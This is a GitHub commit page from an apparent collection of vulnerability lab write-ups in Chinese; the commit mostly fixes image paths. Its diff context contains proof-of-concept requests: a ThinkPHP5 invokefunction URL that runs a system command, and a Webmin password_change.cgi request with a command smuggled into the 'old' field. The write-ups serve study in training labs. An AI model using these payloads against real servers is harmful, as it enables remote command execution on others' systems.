Skip to content

Commit

Permalink
ThinkPHP5远程代码执行漏洞、struts2-052、struts2-045
Browse files Browse the repository at this point in the history
  • Loading branch information
@hu4wufu
hu4wufu committed Aug 21, 2020
1 parent 49f2875 commit db491fa
Show file tree
Hide file tree
Showing 7 changed files with 5 additions and 5 deletions.
2 changes: 1 addition & 1 deletion writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -21,7 +21,7 @@ ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名
```

![2](.\2.png)
![2](./2.png)

## 参考链接

Expand Down
0 ...1命令执行_hu4wufu/image-20200821155114277.png → writeup/thinkphp_5.0.21命令执行_hu4wufu/1.png
View file
File renamed without changes
2 changes: 1 addition & 1 deletion writeup/thinkphp_5.0.21命令执行_hu4wufu/thinkphp_5.0.21命令执行.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -13,7 +13,7 @@ ThinkPHP 5.x < ThinkPHP 5.1.31<= ThinkPHP 5.0.23

1、打开靶场、抓包分析,下面是poc,拿到flag成功。

![image-20200821155114277](.\image-20200821155114277.png)
![1](./1.png)
```
GET /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/tmp HTTP/1.1
Host: 118.193.36.37:28446
Expand Down
0 ...15107_hu4wufu/image-20200821155246605.png → ...bmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/1.png
View file
File renamed without changes
0 ...15107_hu4wufu/image-20200821155231196.png → ...bmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/2.png
View file
File renamed without changes
0 ...15107_hu4wufu/image-20200821155159221.png → ...bmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/3.png
View file
File renamed without changes
6 changes: 3 additions & 3 deletions writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -12,11 +12,11 @@ Webmin 1.920及以下版本。

1、打开靶场,开启Webmin的漏洞环境。

![image-20200821155246605](.\image-20200821155246605.png)
![image-20200821155246605](./1.png)

2、抓取数据包,修改数据,利用poc进行验证,发现有回显。

![image-20200821155231196](.\image-20200821155231196.png)
![image-20200821155231196](./2.png)

```
POST /password_change.cgi HTTP/1.1
Expand All @@ -39,5 +39,5 @@ user=rootxx&pam=&expired=2&old=test|ls /tmp&new1=test2&new2=test2

3、直接查看FLag

![image-20200821155159221](.\image-20200821155159221.png)
![image-20200821155159221](./3.png)

0 comments on commit db491fa

Please sign in to comment.